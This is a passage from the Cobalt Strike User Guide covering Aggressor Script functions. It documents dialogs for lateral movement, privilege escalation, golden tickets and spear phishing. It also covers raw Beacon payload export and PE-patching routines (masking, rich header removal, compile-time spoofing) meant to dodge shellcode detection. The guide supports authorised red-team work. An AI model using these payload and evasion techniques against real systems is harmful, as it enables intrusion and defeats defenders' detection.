Arguments
|
||
$1-theBeaconIDtoapplythisfeatureto
|
||
Example
|
||
item "VPN Pivoting" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openCovertVPNSetup($bid);
|
||
}
|
||
}
|
||
openCredentialManager
|
||
Openthecredentialmanagertab.
|
||
Example
|
||
openCredentialManager();
|
||
openDefaultShortcutsDialog
|
||
OpentheDefaultKeyboardShortcutsdialog.Thisfunctiondoesnothaveanyparameters.
|
||
CobaltStrikeUserGuide www.fortra.com page:381
|
||
|
||
AggressorScript/Functions
|
||
openDownloadBrowser
|
||
Openthedownloadbrowsertab
|
||
Example
|
||
openDownloadBrowser();
|
||
openElevateDialog
|
||
Openthedialogtolaunchaprivilegeescalationexploit.
|
||
Arguments
|
||
$1-thebeaconID
|
||
Example
|
||
item "Elevate" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openElevateDialog($bid);
|
||
}
|
||
}
|
||
openEventLog
|
||
Opentheeventlog.
|
||
Example
|
||
openEventLog();
|
||
openFileBrowser
|
||
OpenthefilebrowserforaBeacon
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:382
|
||
|
||
AggressorScript/Functions
|
||
$1-theBeaconIDtoapplythisfeatureto
|
||
Example
|
||
item "Browse Files" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openFileBrowser($bid);
|
||
}
|
||
}
|
||
openGoldenTicketDialog
|
||
openadialogtohelpgenerateagoldenticket
|
||
Arguments
|
||
$1-theBeaconIDtoapplythisfeatureto
|
||
Example
|
||
item "Golden Ticket" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openGoldenTicketDialog($bid);
|
||
}
|
||
}
|
||
openHTMLApplicationDialog
|
||
OpentheHTMLApplicationDialog.
|
||
Example
|
||
openHTMLApplicationDialog();
|
||
openHostFileDialog
|
||
Openthehostfiledialog.
|
||
CobaltStrikeUserGuide www.fortra.com page:383
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
openHostFileDialog();
|
||
openInterfaceManager
|
||
OpenthetabtomanageCovertVPNinterfaces
|
||
Example
|
||
openInterfaceManager();
|
||
openJavaSignedAppletDialog
|
||
OpentheJavaSignedAppletdialog
|
||
Example
|
||
openJavaSignedAppletDialog();
|
||
openJavaSmartAppletDialog
|
||
OpentheJavaSmartAppletdialog
|
||
Example
|
||
openJavaSmartAppletDialog();
|
||
openJumpDialog
|
||
OpenCobaltStrike'slateralmovementdialog
|
||
Arguments
|
||
$1-thetypeoflateralmovement.See&beacon_remote_exploitsforalistofoptions.sshand
|
||
ssh-keyareoptionstoo.
|
||
$2-anarrayoftargetstoapplythisactionagainst
|
||
CobaltStrikeUserGuide www.fortra.com page:384
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4"));
|
||
openKeystrokeBrowser
|
||
Openthekeystrokebrowsertab
|
||
Example
|
||
openKeystrokeBrowser();
|
||
openListenerManager
|
||
Openthelistenermanager
|
||
Example
|
||
openListenerManager();
|
||
openMakeTokenDialog
|
||
openadialogtohelpgenerateanaccesstoken
|
||
Arguments
|
||
$1-theBeaconIDtoapplythisfeatureto
|
||
Example
|
||
item "Make Token" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openMakeTokenDialog($bid);
|
||
}
|
||
}
|
||
openMalleableProfileDialog
|
||
CobaltStrikeUserGuide www.fortra.com page:385
|
||
|
||
AggressorScript/Functions
|
||
OpenthemalleableC2profiledialog.
|
||
Example
|
||
openMalleableProfileDialog();
|
||
openOfficeMacro
|
||
Opentheofficemacroexportdialog
|
||
Example
|
||
openOfficeMacroDialog();
|
||
openOneLinerDialog
|
||
OpenthedialogtogenerateaPowerShellone-linerforthisspecificBeaconsession.
|
||
Arguments
|
||
$1-thebeaconID
|
||
Example
|
||
item "&One-liner" {
|
||
openOneLinerDialog($1);
|
||
}
|
||
openOrActivate
|
||
IfaBeaconconsoleexists,makeitactive.IfaBeaconconsoledoesnotexist,openit.
|
||
Arguments
|
||
$1-theBeaconID
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:386
|
||
|
||
AggressorScript/Functions
|
||
item "&Activate" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openOrActivate($bid);
|
||
}
|
||
}
|
||
openPayloadGeneratorDialog
|
||
OpenthePayloadGeneratordialog.
|
||
Example
|
||
openPayloadGeneratorDialog();
|
||
openPayloadHelper
|
||
Openapayloadchooserdialog.
|
||
Arguments
|
||
$1-acallbackfunction.Arguments:$1-theselectedlistener.
|
||
Example
|
||
openPayloadHelper(lambda({
|
||
bspawn($bid, $1);
|
||
}, $bid => $1));
|
||
openPivotListenerSetup
|
||
openthepivotlistenersetupdialog
|
||
Arguments
|
||
$1-theBeaconIDtoapplythisfeatureto
|
||
Example
|
||
item "Listener..." {
|
||
local('$bid');
|
||
CobaltStrikeUserGuide www.fortra.com page:387
|
||
|
||
AggressorScript/Functions
|
||
foreach $bid ($1) {
|
||
openPivotListenerSetup($bid);
|
||
}
|
||
}
|
||
openPortScanner
|
||
Opentheportscannerdialog
|
||
Arguments
|
||
$1-anarrayoftargetstoscan
|
||
Example
|
||
openPortScanner(@("192.168.1.3"));
|
||
openPortScannerLocal
|
||
OpentheportscannerdialogwithoptionstotargetaBeacon'slocalnetwork
|
||
Arguments
|
||
$1-thebeacontotargetwiththisfeature
|
||
Example
|
||
item "Scan" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openPortScannerLocal($bid);
|
||
}
|
||
}
|
||
openPowerShellWebDialog
|
||
OpenthedialogtosetupthePowerShellWebDeliveryAttack
|
||
Example
|
||
openPowerShellWebDialog();
|
||
CobaltStrikeUserGuide www.fortra.com page:388
|
||
|
||
AggressorScript/Functions
|
||
openPreferencesDialog
|
||
Openthepreferencesdialog
|
||
Example
|
||
openPreferencesDialog();
|
||
openProcessBrowser
|
||
OpenaprocessbrowserforoneormoreBeacons
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
item "Processes" {
|
||
openProcessBrowser($1);
|
||
}
|
||
openSOCKSBrowser
|
||
OpenthetabtolistSOCKSproxyservers
|
||
Example
|
||
openSOCKSBrowser();
|
||
openSOCKSSetup
|
||
opentheSOCKSproxyserversetupdialog
|
||
Arguments
|
||
$1-theBeaconIDtoapplythisfeatureto
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:389
|
||
|
||
AggressorScript/Functions
|
||
item "SOCKS Server" {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openSOCKSSetup($bid);
|
||
}
|
||
}
|
||
openScreenshotBrowser
|
||
Openthescreenshotbrowsertab
|
||
Example
|
||
openScreenshotBrowser();
|
||
openScriptConsole
|
||
OpentheAggressorScriptconsole.
|
||
Example
|
||
openScriptConsole();
|
||
openScriptManager
|
||
Openthetabforthescriptmanager.
|
||
Example
|
||
openScriptManager();
|
||
openScriptedWebDialog
|
||
OpenthedialogtosetupaScriptedWebDeliveryAttack
|
||
Example
|
||
openScriptedWebDialog();
|
||
CobaltStrikeUserGuide www.fortra.com page:390
|
||
|
||
AggressorScript/Functions
|
||
openServiceBrowser
|
||
Openservicebrowserdialog
|
||
Arguments
|
||
$1-anarrayoftargetstoshowservicesfor
|
||
Example
|
||
openServiceBrowser(@("192.168.1.3"));
|
||
openSiteManager
|
||
Openthesitemanager.
|
||
Example
|
||
openSiteManager();
|
||
openSpawnAsDialog
|
||
Opendialogtospawnapayloadasanotheruser
|
||
Arguments
|
||
$1-theBeaconIDtoapplythisfeatureto
|
||
Example
|
||
item "Spawn As..." {
|
||
local('$bid');
|
||
foreach $bid ($1) {
|
||
openSpawnAsDialog($bid);
|
||
}
|
||
}
|
||
openSpearPhishDialog
|
||
CobaltStrikeUserGuide www.fortra.com page:391
|
||
|
||
AggressorScript/Functions
|
||
Openthedialogforthespearphishingtool.
|
||
Example
|
||
openSpearPhishDialog();
|
||
openSystemInformationDialog
|
||
Openthesysteminformationdialog.
|
||
Example
|
||
openSystemInformationDialog();
|
||
openSystemProfilerDialog
|
||
Openthedialogtosetupthesystemprofiler.
|
||
Example
|
||
openSystemProfilerDialog();
|
||
openTargetBrowser
|
||
Openthetargetsbrowser
|
||
Example
|
||
openTargetBrowser();
|
||
openWebLog
|
||
Opentheweblogtab.
|
||
Example
|
||
openWebLog();
|
||
CobaltStrikeUserGuide www.fortra.com page:392
|
||
|
||
AggressorScript/Functions
|
||
openWindowsDropperDialog
|
||
REMOVED Removed in Cobalt Strike 4.0.
|
||
openWindowsExecutableDialog
|
||
OpenthedialogtogenerateaWindowsexecutable.
|
||
Example
|
||
openWindowsExecutableDialog();
|
||
openWindowsExecutableStage
|
||
OpenthedialogtogenerateastagelessWindowsexecutable.
|
||
Example
|
||
openWindowsExecutableStage();
|
||
openWindowsExecutableStageAllDialog
|
||
Openthedialogtogenerateallofthestagelesspayloads(inx86andx64)forallofthe
|
||
configuredlisteners.ThisdialogcanalsobefoundintheUImenuunderPayloads -> Windows
|
||
Stageless Generate all Payloads.
|
||
Example
|
||
openWindowsExecutableStageAllDialog();
|
||
payload
|
||
ExportsarawpayloadforaspecificCobaltStrikelistener.
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-x86|x64thearchitectureofthepayload
|
||
CobaltStrikeUserGuide www.fortra.com page:393
|
||
|
||
AggressorScript/Functions
|
||
$3-exitmethod:'thread'(leavethethreadwhendone)or'process'(exittheprocesswhen
|
||
done).Use'thread'ifinjectingintoanexistingprocess.
|
||
$4-Astringvalueforthesystemcallmethod.Validvaluesare:
|
||
None:UsethestandardWindowsAPIfunction.
|
||
Direct:UsetheNt*versionofthefunction.
|
||
Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
|
||
$5-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank
|
||
string).
|
||
Returns
|
||
Ascalarcontainingposition-independentcodeforthespecifiedlistener.
|
||
Example
|
||
$data = payload("my listener", "x86", "process", "Direct");
|
||
$handle = openf(">out.bin");
|
||
writeb($handle, $data);
|
||
closef($handle);
|
||
payload_bootstrap_hint
|
||
GettheoffsettofunctionpointerhintsusedbyBeacon'sReflectiveLoader.Populatethesehints
|
||
withtheasked-forprocessaddressestohaveBeaconloaditselfintomemoryinamoreOPSEC-
|
||
safeway.
|
||
Arguments
|
||
$1-thepayloadposition-independentcode(specifically,Beacon)
|
||
$2-thefunctiontogetthepatchlocationfor
|
||
Notes
|
||
CobaltStrikeUserGuide www.fortra.com page:394
|
||
|
||
AggressorScript/Functions
|
||
l CobaltStrike'sBeaconhasaprotocoltoacceptartifact-providedfunctionpointersfor
|
||
functionsrequiredbyBeacon'sReflectiveLoader.Theprotocolistopatchthelocationof
|
||
GetProcAddressandGetModuleHandleAintotheBeaconDLL.Useofthisprotocol
|
||
allowsBeacontoloaditselfinmemorywithouttriggeringshellcodedetectionheuristics
|
||
thatmonitorreadsofkernel32'sExportAddressTable.Thisprotocolisoptional.
|
||
Artifactsthatdon'tfollowthisprotocolwillfallbacktoresolvingkeyfunctionsviathe
|
||
ExportAddressTable.
|
||
l TheArtifactKitandResourceKitbothimplementthisprotocol.Downloadthesekitsto
|
||
seehowtousethisfunction.
|
||
Returns
|
||
TheoffsettoamemorylocationtopatchwithapointerforaspecificfunctionusedbyBeacon's
|
||
ReflectiveLoader.
|
||
payload_local
|
||
ExportsarawpayloadforaspecificCobaltStrikelistener.Usethisfunctionwhenyouplanto
|
||
spawnthispayloadfromanotherBeaconsession.CobaltStrikewillgenerateapayloadthat
|
||
embedskeyfunctionpointers,neededtobootstraptheagent,takenfromtheparentsession's
|
||
metadata.
|
||
Arguments
|
||
$1-theparentBeaconsessionID
|
||
$2-thelistenername
|
||
$3-x86|x64thearchitectureofthepayload
|
||
$4-exitmethod:'thread'(leavethethreadwhendone)or'process'(exittheprocesswhen
|
||
done).Use'thread'ifinjectingintoanexistingprocess.
|
||
$5-Astringvalueforthesystemcallmethod.Validvaluesare:
|
||
None:UsethestandardWindowsAPIfunction.
|
||
Direct:UsetheNt*versionofthefunction.
|
||
Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
|
||
$6-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank
|
||
string).
|
||
CobaltStrikeUserGuide www.fortra.com page:395
|
||
|
||
AggressorScript/Functions
|
||
Returns
|
||
Ascalarcontainingposition-independentcodeforthespecifiedlistener.
|
||
Example
|
||
$data = payload_local($bid, "my listener", "x86", "process", "None");
|
||
$handle = openf(">out.bin");
|
||
writeb($handle, $data);
|
||
closef($handle);
|
||
pe_insert_rich_header
|
||
InsertrichheaderdataintoBeaconDLLContent.Ifthereisexistingrichheaderinformation,it
|
||
willbereplaced.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-Richheader
|
||
Returns
|
||
UpdatedDLLContent
|
||
Note
|
||
Therichheaderlengthshouldbeona4byteboundaryforsubsequentchecksumcalculations.
|
||
Example
|
||
# -------------------------------------
|
||
# Insert (replace) rich header
|
||
# -------------------------------------
|
||
$rich_header = "<your rich header info>";
|
||
$temp_dll = pe_insert_rich_header($temp_dll, $rich_header);
|
||
pe_mask
|
||
CobaltStrikeUserGuide www.fortra.com page:396
|
||
|
||
AggressorScript/Functions
|
||
MaskdataintheBeaconDLLContentbasedonpositionandlength.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-Startlocation
|
||
$3-Lengthtomask
|
||
$4-Bytevaluemaskkey(int)
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
# ===========================================================================
|
||
# $1 = Beacon DLL content
|
||
# ===========================================================================
|
||
sub demo_pe_mask {
|
||
local('$temp_dll, $start, $length, $maskkey');
|
||
local('%pemap');
|
||
local('@loc_en, @val_en');
|
||
$temp_dll = $1;
|
||
# -------------------------------------
|
||
# Inspect the current DLL...
|
||
# -------------------------------------
|
||
%pemap = pedump($temp_dll);
|
||
@loc_en = values(%pemap, @("Export.Name."));
|
||
@val_en = values(%pemap, @("Export.Name."));
|
||
if (size(@val_en) != 1) {
|
||
warn("Unexpected size of export name value array: " . size(@val_en));
|
||
} else {
|
||
warn("Current export value: " . @val_en[0]);
|
||
}
|
||
if (size(@loc_en) != 1) {
|
||
warn("Unexpected size of export location array: " . size(@loc_en));
|
||
} else {
|
||
CobaltStrikeUserGuide www.fortra.com page:397
|
||
|
||
AggressorScript/Functions
|
||
warn("Current export name location: " . @loc_en[0]);
|
||
}
|
||
# -------------------------------------
|
||
# Set parameters (parse number as base 10)
|
||
# -------------------------------------
|
||
$start = parseNumber(@loc_en[0], 10);
|
||
$length = 4;
|
||
$maskkey = 22;
|
||
# -------------------------------------
|
||
# mask some data in a dll
|
||
# -------------------------------------
|
||
# warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
|
||
$temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# un-mask (running the same mask a second time should "un-mask")
|
||
# (This would normally be done by the reflective loader)
|
||
# -------------------------------------
|
||
# warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
|
||
# $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_mask_section
|
||
MaskdataintheBeaconDLLContentbasedonpositionandlength.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-Sectionname
|
||
$3-Bytevaluemaskkey(int)
|
||
Returns
|
||
CobaltStrikeUserGuide www.fortra.com page:398
|
||
|
||
AggressorScript/Functions
|
||
UpdatedDLLContent
|
||
Example
|
||
# ===========================================================================
|
||
# $1 = Beacon DLL content
|
||
# ===========================================================================
|
||
sub demo_pe_mask_section {
|
||
local('$temp_dll, $section_name, $maskkey');
|
||
local('@loc_en, @val_en');
|
||
$temp_dll = $1;
|
||
# -------------------------------------
|
||
# Set parameters
|
||
# -------------------------------------
|
||
$section_name = ".text";
|
||
$maskkey = 23;
|
||
# -------------------------------------
|
||
# mask a section in a dll
|
||
# -------------------------------------
|
||
# warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
|
||
$temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# un-mask (running the same mask a second time should "un-mask")
|
||
# (This would normally be done by the reflective loader)
|
||
# -------------------------------------
|
||
# warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
|
||
# $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_mask_string
|
||
CobaltStrikeUserGuide www.fortra.com page:399
|
||
|
||
AggressorScript/Functions
|
||
MaskastringintheBeaconDLLContentbasedonposition.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-Startlocation
|
||
$3-Bytevaluemaskkey(int)
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
# ===========================================================================
|
||
# $1 = Beacon DLL content
|
||
# ===========================================================================
|
||
sub demo_pe_mask_string {
|
||
local('$temp_dll, $location, $length, $maskkey');
|
||
local('%pemap');
|
||
local('@loc);
|
||
$temp_dll = $1;
|
||
# -------------------------------------
|
||
# Inspect the current DLL...
|
||
# -------------------------------------
|
||
%pemap = pedump($temp_dll);
|
||
@loc = values(%pemap, @("Sections.AddressOfName.0."));
|
||
if (size(@loc) != 1) {
|
||
warn("Unexpected size of section name location array: " . size(@loc));
|
||
} else {
|
||
warn("Current section name location: " . @loc[0]);
|
||
}
|
||
# -------------------------------------
|
||
# Set parameters
|
||
# -------------------------------------
|
||
$location = @loc[0];
|
||
$length = 5;
|
||
$maskkey = 23;
|
||
CobaltStrikeUserGuide www.fortra.com page:400
|
||
|
||
AggressorScript/Functions
|
||
# -------------------------------------
|
||
# pe_mask_string (mask a string in a dll)
|
||
# -------------------------------------
|
||
# warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
|
||
$temp_dll = pe_mask_string($temp_dll, $location, $maskkey);
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# un-mask (running the same mask a second time should "un-mask")
|
||
# we are unmasking the length of the string and the null character
|
||
# (This would normally be done by the reflective loader)
|
||
# -------------------------------------
|
||
# warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey .
|
||
")");
|
||
# $temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_patch_code
|
||
PatchcodeintheBeaconDLLContentbasedonfind/replacein'.text'section'.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-bytearraytofindforresolveoffset
|
||
$3-bytearrayplaceatresolvedoffset(overwritedata)
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:401
|
||
|
||
AggressorScript/Functions
|
||
# ===========================================================================
|
||
# $1 = Beacon DLL content
|
||
# ===========================================================================
|
||
sub demo_pe_patch_code {
|
||
local('$temp_dll, $findme, $replacement');
|
||
$temp_dll = $1;
|
||
# ====== simple text values ======
|
||
$findme = "abcABC123";
|
||
$replacement = "123ABCabc";
|
||
# warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
|
||
$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
|
||
# ====== byte array as a hex string ======
|
||
$findme = "\x01\x02\x03\xfc\xfe\xff";
|
||
$replacement = "\x01\x02\x03\xfc\xfe\xff";
|
||
# warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
|
||
$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_remove_rich_header
|
||
RemovetherichheaderfromBeaconDLLContent.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:402
|
||
|
||
AggressorScript/Functions
|
||
# -------------------------------------
|
||
# Remove/Replace Rich Header
|
||
# -------------------------------------
|
||
$temp_dll = pe_remove_rich_header($temp_dll);
|
||
pe_set_compile_time_with_long
|
||
SetthecompiletimeintheBeaconDLLContent.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-CompileTime(asalonginmilliseconds)
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
# date is in milliseconds ("1893521594000" = "01 Jan 2030 12:13:14")
|
||
$date = 1893521594000;
|
||
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
|
||
# date is in milliseconds ("1700000001000" = "14 Nov 2023 16:13:21")
|
||
$date = 1700000001000;
|
||
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
|
||
pe_set_compile_time_with_string
|
||
SetthecompiletimeintheBeaconDLLContent.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-CompileTime(asastring)
|
||
Returns
|
||
UpdatedDLLContent
|
||
CobaltStrikeUserGuide www.fortra.com page:403
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
# ("01 Jan 2020 15:16:17" = "1577913377000")
|
||
$strTime = "01 Jan 2020 15:16:17";
|
||
$temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime);
|
||
pe_set_export_name
|
||
SettheexportnameintheBeaconDLLContent.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
Returns
|
||
UpdatedDLLContent
|
||
Note
|
||
Thenamemustexistinthestringtable.
|
||
Example
|
||
# -------------------------------------
|
||
# name must be in strings table...
|
||
# -------------------------------------
|
||
$export_name = "WININET.dll";
|
||
$temp_dll = pe_set_export_name($temp_dll, $export_name);
|
||
$export_name = "beacon.dll";
|
||
$temp_dll = pe_set_export_name($temp_dll, $export_name);
|
||
pe_set_long
|
||
Placesalongvalueataspecifiedlocation.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
CobaltStrikeUserGuide www.fortra.com page:404
|
||
|
||
AggressorScript/Functions
|
||
$2-Location
|
||
$3-Value
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
# ===========================================================================
|
||
# $1 = Beacon DLL content
|
||
# ===========================================================================
|
||
sub demo_pe_set_long {
|
||
local('$temp_dll, $int_offset, $long_value');
|
||
local('%pemap');
|
||
local('@loc_cs, @val_cs');
|
||
$temp_dll = $1;
|
||
# -------------------------------------
|
||
# Inspect the current DLL...
|
||
# -------------------------------------
|
||
%pemap = pedump($temp_dll);
|
||
@loc_cs = values(%pemap, @("CheckSum.<location>"));
|
||
@val_cs = values(%pemap, @("CheckSum.<value>"));
|
||
if (size(@val_cs) != 1) {
|
||
warn("Unexpected size of checksum value array: " . size(@val_cs));
|
||
} else {
|
||
warn("Current checksum value: " . @val_cs[0]);
|
||
}
|
||
if (size(@loc_cs) != 1) {
|
||
warn("Unexpected size of checksum location array: " . size(@loc_cs));
|
||
} else {
|
||
warn("Current checksum location: " . @loc_cs[0]);
|
||
}
|
||
# -------------------------------------
|
||
# Set parameters (parse number as base 10)
|
||
# -------------------------------------
|
||
$int_offset = parseNumber(@loc_cs[0], 10);
|
||
$long_value = 98765;
|
||
CobaltStrikeUserGuide www.fortra.com page:405
|
||
|
||
AggressorScript/Functions
|
||
# -------------------------------------
|
||
# pe_set_long (set a long value)
|
||
# -------------------------------------
|
||
# warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
|
||
$temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);
|
||
# -------------------------------------
|
||
# Did it work?
|
||
# -------------------------------------
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_set_short
|
||
Placesashortvalueataspecifiedlocation.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-Location
|
||
$3-Value
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
# ===========================================================================
|
||
# $1 = Beacon DLL content
|
||
# ===========================================================================
|
||
sub demo_pe_set_short {
|
||
local('$temp_dll, $int_offset, $short_value');
|
||
local('%pemap');
|
||
local('@loc, @val');
|
||
CobaltStrikeUserGuide www.fortra.com page:406
|
||
|
||
AggressorScript/Functions
|
||
$temp_dll = $1;
|
||
# -------------------------------------
|
||
# Inspect the current DLL...
|
||
# -------------------------------------
|
||
%pemap = pedump($temp_dll);
|
||
@loc = values(%pemap, @(".text.NumberOfRelocations."));
|
||
@val = values(%pemap, @(".text.NumberOfRelocations."));
|
||
if (size(@val) != 1) {
|
||
warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val));
|
||
} else {
|
||
warn("Current .text.NumberOfRelocations value: " . @val[0]);
|
||
}
|
||
if (size(@loc) != 1) {
|
||
warn("Unexpected size of .text.NumberOfRelocations location array: " . size
|
||
(@loc));
|
||
} else {
|
||
warn("Current .text.NumberOfRelocations location: " . @loc[0]);
|
||
}
|
||
# -------------------------------------
|
||
# Set parameters (parse number as base 10)
|
||
# -------------------------------------
|
||
$int_offset = parseNumber(@loc[0], 10);
|
||
$short_value = 128;
|
||
# -------------------------------------
|
||
# pe_set_short (set a short value)
|
||
# -------------------------------------
|
||
# warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
|
||
$temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);
|
||
# -------------------------------------
|
||
# Did it work?
|
||
# -------------------------------------
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_set_string
|
||
CobaltStrikeUserGuide www.fortra.com page:407
|
||
|
||
AggressorScript/Functions
|
||
Placesastringvalueataspecifiedlocation.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-Startlocation
|
||
$3-Value
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
# ===========================================================================
|
||
# $1 = Beacon DLL content
|
||
# ===========================================================================
|
||
sub demo_pe_set_string {
|
||
local('$temp_dll, $location, $value');
|
||
local('%pemap');
|
||
local('@loc_en, @val_en');
|
||
$temp_dll = $1;
|
||
# -------------------------------------
|
||
# Inspect the current DLL...
|
||
# -------------------------------------
|
||
%pemap = pedump($temp_dll);
|
||
@loc_en = values(%pemap, @("Export.Name."));
|
||
@val_en = values(%pemap, @("Export.Name."));
|
||
if (size(@val_en) != 1) {
|
||
warn("Unexpected size of export name value array: " . size(@val_en));
|
||
} else {
|
||
warn("Current export value: " . @val_en[0]);
|
||
}
|
||
if (size(@loc_en) != 1) {
|
||
warn("Unexpected size of export location array: " . size(@loc_en));
|
||
} else {
|
||
warn("Current export name location: " . @loc_en[0]);
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:408
|
||
|
||
AggressorScript/Functions
|
||
# -------------------------------------
|
||
# Set parameters (parse number as base 10)
|
||
# -------------------------------------
|
||
$location = parseNumber(@loc_en[0], 10);
|
||
$value = "BEECON.DLL";
|
||
# -------------------------------------
|
||
# pe_set_string (set a string value)
|
||
# -------------------------------------
|
||
# warn("pe_set_string(dll, " . $location . ", " . $value . ")");
|
||
$temp_dll = pe_set_string($temp_dll, $location, $value);
|
||
# -------------------------------------
|
||
# Did it work?
|
||
# -------------------------------------
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_set_stringz
|
||
Placesastringvalueataspecifiedlocationandaddsazeroterminator.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-Startlocation
|
||
$3-Stringtoset
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
# ===========================================================================
|
||
# $1 = Beacon DLL content
|
||
CobaltStrikeUserGuide www.fortra.com page:409
|
||
|
||
AggressorScript/Functions
|
||
# ===========================================================================
|
||
sub demo_pe_set_stringz {
|
||
local('$temp_dll, $offset, $value');
|
||
local('%pemap');
|
||
local('@loc');
|
||
$temp_dll = $1;
|
||
# -------------------------------------
|
||
# Inspect the current DLL...
|
||
# -------------------------------------
|
||
%pemap = pedump($temp_dll);
|
||
@loc = values(%pemap, @("Sections.AddressOfName.0."));
|
||
if (size(@loc) != 1) {
|
||
warn("Unexpected size of section name location array: " . size(@loc));
|
||
} else {
|
||
warn("Current section name location: " . @loc[0]);
|
||
}
|
||
# -------------------------------------
|
||
# Set parameters (parse number as base 10)
|
||
# -------------------------------------
|
||
$offset = parseNumber(@loc[0], 10);
|
||
$value = "abc";
|
||
# -------------------------------------
|
||
# pe_set_stringz
|
||
# -------------------------------------
|
||
# warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
|
||
$temp_dll = pe_set_stringz($temp_dll, $offset, $value);
|
||
# -------------------------------------
|
||
# Did it work?
|
||
# -------------------------------------
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# Set parameters
|
||
# -------------------------------------
|
||
# $offset = parseNumber(@loc[0], 10);
|
||
# $value = ".tex";
|
||
# -------------------------------------
|
||
# pe_set_string (set a string value)
|
||
# -------------------------------------
|
